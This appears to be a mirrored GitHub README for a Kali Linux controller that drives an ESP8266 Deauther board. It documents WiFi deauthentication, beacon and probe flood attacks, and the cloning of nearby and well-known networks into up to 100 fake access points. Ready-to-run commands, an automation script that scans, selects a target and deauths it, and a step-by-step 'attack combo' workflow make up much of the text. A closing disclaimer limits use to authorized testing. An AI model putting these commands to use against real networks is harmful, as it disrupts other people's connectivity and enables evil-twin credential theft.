Thanks to visit codestin.com
Credit goes to github.com

Skip to content

eshwargit2/Kali_Deauther

Repository files navigation

ESP8266 Deauther Controller for Kali Linux

A powerful command-line shell controller for the ESP8266 Deauther project. Control your ESP8266 Deauther via serial connection from Kali Linux (or any Linux distribution).

Features

  • Auto-detect ESP8266 Deauther serial port
  • Interactive shell with command history
  • All Deauther commands supported (scan, attack, SSIDs, etc.)
  • Color-coded output for easy reading
  • Script execution support
  • Single command mode for automation
  • Tab completion and command history
  • WiFi Network Cloning - Scan and clone nearby WiFi networks for fake AP attacks
  • Mass SSID Creation - Generate up to 100 fake network variations automatically
  • WiFi Controller - Control ESP8266 Deauther over WiFi connection

WiFi Cloning Features

Automatic Network Scanning and Cloning

The deauther_wifi.sh script now includes advanced WiFi network cloning capabilities:

  • Smart WiFi Scanning: Uses multiple methods (nmcli, iwlist, airodump-ng) to discover nearby networks
  • Network Selection: Choose specific networks or clone all discovered networks
  • Variation Generation: Automatically creates fake network variations (e.g., "WiFi_Free", "Guest_WiFi")
  • Bulk Loading: Up to 100 fake networks loaded into ESP8266 Deauther automatically

Usage Examples

Basic WiFi Controller

# Connect to deauther and start controller
./deauther_wifi.sh

# Connect to custom deauther network
./deauther_wifi.sh "MyDeauther" "mypassword" wlan0 192.168.4.1

Python WiFi Cloning (New!)

# Quick clone all nearby networks
python3 wifi_clone_example.py --clone-all

# Interactive network selection
python3 wifi_clone_example.py --interactive

# Clone specific SSIDs
python3 wifi_clone_example.py --ssids "Starbucks,McDonalds_WiFi,Hotel_Guest"

# Direct controller usage
python3 deauther_wifi.py --host 192.168.4.1
# Then use option [6] Quick Clone WiFi in main menu

Cloning Options

When you run the WiFi version, you'll get these cloning options:

  • [A] Clone ALL networks: Clones all discovered networks with variations (up to 100)
  • [S] Select specific networks: Choose individual networks by ID
  • [T] Clone top 20: Clone the 20 strongest signal networks
  • [C] Cancel: Continue without cloning

New Menu Options in Python Controller

Main Menu

  • [6] Quick Clone WiFi: One-click scan and clone nearby networks
  • [A] Shell Mode: Advanced command line interface

SSID Menu

  • [5] Scan WiFi Networks: Scan for nearby networks using system tools
  • [6] Clone All Networks: Clone all discovered networks with variations (no duplicates)
  • [7] Clone Selected Networks: Choose specific networks to clone
  • [8] Generate Fake Networks: Create 100% diverse fake networks (hotels, cafes, businesses)
  • [9] Mass Clone Networks: Create clones from custom SSID list
  • [C] Clear All SSIDs: Remove all networks

Improved Cloning Features

Diverse Network Generation

The new system creates completely different network names instead of duplicates:

Network Categories Generated:

  • Business: CorporateWiFi, BusinessNet, OfficeGuest, Enterprise_WiFi
  • Public: Free_WiFi, Guest_Network, Public_Access, Open_WiFi
  • Hospitality: Hotel_Guest, Restaurant_WiFi, Cafe_Free, Bar_WiFi
  • Retail: Mall_WiFi, Store_Guest, Shopping_WiFi, Retail_Access
  • Transport: Airport_WiFi, Station_Free, Bus_WiFi, Train_Access
  • Education: University_WiFi, Campus_Guest, Student_WiFi, Library_WiFi
  • Healthcare: Hospital_Guest, Clinic_WiFi, Medical_WiFi, Health_Access
  • Residential: Home_WiFi, Family_Guest, House_Network, Private_WiFi

Smart Security Mix

  • Open Networks: Guest, Free, Public networks (realistic)
  • WPA2 Networks: Corporate, Business, Private networks (realistic)
  • Random Assignment: Mixed security for variety

Network Variations Created

For each original network, the tool creates variations like:

  • OriginalName_Free
  • OriginalName_Guest
  • OriginalName_Public
  • Free_OriginalName
  • Guest_OriginalName
  • OriginalName-Guest
  • OriginalName2024

How WiFi Scanning Works

  1. nmcli scan: Uses NetworkManager for reliable results
  2. iwlist scan: Fallback method for systems without NetworkManager
  3. Automatic filtering: Removes duplicate and invalid SSIDs
  4. Signal sorting: Networks sorted by signal strength

Requirements

  • Python 3.6+
  • pyserial library (for USB connection)
  • requests library (for WiFi connection)
  • ESP8266 Deauther connected via USB or WiFi
  • NetworkManager or wireless-tools (for WiFi scanning)

Installation

# Install required Python packages
pip3 install pyserial requests

# Make scripts executable
chmod +x deauther.sh
chmod +x deauther_wifi.sh
chmod +x deauther_controller.py

Usage

Interactive Shell (Recommended)

# Auto-detect and connect
./deauther.sh

# Or specify port directly
python3 deauther_controller.py -p /dev/ttyUSB0

Single Command Mode

# Scan for access points
python3 deauther_controller.py -p /dev/ttyUSB0 -c "scan aps"

# Start deauth attack
python3 deauther_controller.py -p /dev/ttyUSB0 -c "attack deauth"

Script Mode

# Execute commands from a file
python3 deauther_controller.py -p /dev/ttyUSB0 -s attack_script.txt

Shell Commands

Connection

Command Description
connect [port] Connect to Deauther (auto-detect if no port)
disconnect Disconnect from Deauther

Scanning

Command Description
scan aps [time] Scan for access points (default: 5s)
scan stations [time] Scan for stations/clients (default: 15s)
scan all [time] Scan for everything (default: 15s)
scan wifi [time] [ch] WiFi scan mode for packet monitor

Display

Command Description
show aps Show discovered access points
show stations Show discovered stations
show names Show saved device names
show ssids Show SSID list
show selected Show selected targets only

Target Selection

Command Description
select ap <id> Select access point by ID
select station <id> Select station by ID
select all Select all targets
deselect ap <id> Deselect access point
deselect all Deselect all targets

Attacks

Command Description
attack deauth [timeout] Deauth selected targets
attack deauthall [timeout] Deauth all nearby clients
attack beacon [timeout] Beacon flood with SSID list
attack probe [timeout] Probe request flood
attack combo [timeout] Combined deauth + beacon
stop Stop all attacks/scans
stop attack Stop attack only
stop scan Stop scan only

SSID Management

Command Description
ssid add "<name>" Add SSID to beacon list
ssid add -ap <id> Copy SSID from scanned AP
ssid remove <id> Remove SSID by ID
ssid clear Remove all SSIDs

Device Control

Command Description
ap start [ssid] [password] Start Deauther access point
ap stop Stop access point
led <r> <g> <b> Set LED color (RGB)
led #rrggbb Set LED color (hex)
reboot Reboot device

Information

Command Description
info Show firmware info
sysinfo Show system info (RAM, MAC, etc)
settings get <key> Get setting value
settings set <key> <value> Set setting value

Utility

Command Description
raw <command> Send raw command to device
verbose [on/off] Toggle verbose output
clear Clear screen
help Show all commands
exit / quit Exit the shell

Example Workflow

# 1. Start the controller
./deauther.sh

# 2. Connect (auto-detect)
deauther> connect

# 3. Scan for networks
deauther> scan aps 10

# 4. Show results
deauther> show aps

# 5. Select target (AP ID 0)
deauther> select ap 0

# 6. Add SSIDs for beacon flood
deauther> ssid add "FreeWiFi"
deauther> ssid add "Hotel_Guest"

# 7. Start combined attack (60 seconds)
deauther> attack combo 60

# 8. Stop attack
deauther> stop

# 9. Exit
deauther> exit

Automation Script Example

Create a file attack_script.txt:

scan aps 5
select ap 0
attack deauth 30
stop

Run it:

python3 deauther_controller.py -p /dev/ttyUSB0 -s attack_script.txt

Troubleshooting

Permission Denied

# Add user to dialout group
sudo usermod -a -G dialout $USER

# Or run with sudo
sudo python3 deauther_controller.py

Device Not Found

# List serial devices
ls /dev/ttyUSB* /dev/ttyACM*

# Check dmesg for USB connections
dmesg | grep -i usb | tail -20

Wrong Baud Rate

# Try different baud rate
python3 deauther_controller.py -p /dev/ttyUSB0 -b 9600

Legal Disclaimer

⚠️ WARNING: This tool is for educational and authorized testing purposes only.

  • Only use on networks you own or have explicit permission to test
  • Deauthentication attacks are illegal in most jurisdictions without authorization
  • The authors are not responsible for misuse of this software

License

MIT License - See LICENSE file for details.

Credits

  • ESP8266 Deauther by SpacehuhnTech
  • Kali Linux Controller by ESP8266 Deauther Community

About

Used to a Esp8266 wifi deather flimeware based api access in to terminal line execution

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published